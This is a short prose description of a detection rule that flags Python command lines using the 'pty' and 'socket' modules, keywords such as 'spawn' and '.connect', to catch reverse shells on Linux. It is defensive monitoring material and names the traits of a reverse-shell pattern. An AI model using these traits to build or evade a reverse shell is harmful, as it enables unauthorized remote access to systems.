This detection rule monitors for the execution of Python scripts that utilize the 'pty' and 'socket' modules to establish a reverse shell. The rule specifically looks for instances where Python is invoked with commands that contain common shell creation features such as 'import', 'pty', 'socket', 'spawn', or '.connect'. The presence of these keywords in the command line indicates that the script is likely attempting to create a reverse shell, a common method used by attackers to gain unauthorized access to a system. The rule captures process creation events to flag these suspicious patterns and enhances the security monitoring strategy by identifying potential exploitation in Linux environments. This is particularly vital for environments where Python is commonly used for legitimate administrative scripts, thus helping to minimize false positives while ensuring significant threat coverage.